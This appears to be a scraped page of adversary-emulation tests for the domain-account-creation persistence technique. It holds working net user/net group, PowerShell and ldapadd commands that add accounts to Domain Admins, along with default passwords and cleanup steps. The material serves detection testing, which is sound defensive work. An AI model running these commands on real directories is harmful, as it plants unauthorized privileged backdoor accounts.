Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain
command can be used to create a domain account.(Citation: Savill 1999)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON
Atomic Test #3 - Create a new Domain Account using PowerShell
Atomic Test #5 - Active Directory Create User Account (Non-elevated)
Creates a new domain admin user in a command prompt.
Supported Platforms: Windows
auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.002_Admin| | password | Password of the user to create | string | T1136_pass123!| | group | Domain administrator group to which add the user to | string | Domain Admins|
1
command_prompt
!net user "#{username}" "#{password}" /add /domain
net group "#{group}" "#{username}" /add /domain
net user "#{username}" >nul 2>&1 /del /domain
Create a new account similar to ANONYMOUS LOGON in a command prompt.
Supported Platforms: Windows
auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | ANONYMOUS LOGON| | password | Password of the user to create | string | T1136_pass123!|
1
command_prompt
!net user "#{username}" "#{password}" /add /domain
net user "#{username}" >nul 2>&1 /del /domain
Creates a new Domain User using the credentials of the Current User
Supported Platforms: Windows
auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Name of the Account to be created | string | T1136.002_Admin| | password | Password of the Account to be created | string | T1136_pass123!|
1
powershell
!1
2
3
4
5
6
7
8
9
10
11
12
13
$SamAccountName = '#{username}'
$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
$User.SamAccountName = $SamAccountName
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
$User.DisplayName = $SamAccountName
$User.Save()
$User
1
cmd /c "net user #{username} /del >nul 2>&1"
Use Admin Credentials to Create A Domain Admin Account
Supported Platforms: Linux
auto_generated_guid: 562aa072-524e-459a-ba2b-91f1afccf5ab
| Name | Description | Type | Default Value | |——|————-|——|—————| | domain | The domain to be tested | string | example| | top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | test| | admin_user | username@domain of a user with admin privileges | string | admin@example.test| | admin_password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD!| | domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM|
1
sh
!1
2
3
echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
1
2
3
4
5
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif
1
sh
!1
which ldapadd && which ldapmodify
1
echo ldapadd or ldapmodify not found; exit 1
Use Admin Credentials to Create A Normal Account (as means of entry)
Supported Platforms: Linux
auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31
| Name | Description | Type | Default Value | |——|————-|——|—————| | domain | The domain to be tested | string | example| | top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | test| | admin_user | username@domain of a user with admin privileges | string | user@example.test| | admin_password | password of the user | string | s3CurePssw0rD!| | domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM|
1
sh
!1
2
3
echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
1
2
3
4
5
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif
1
sh
!1
2
which ldapadd
which ldapmodify
1
echo ldapadd or ldapmodify not found; exit 1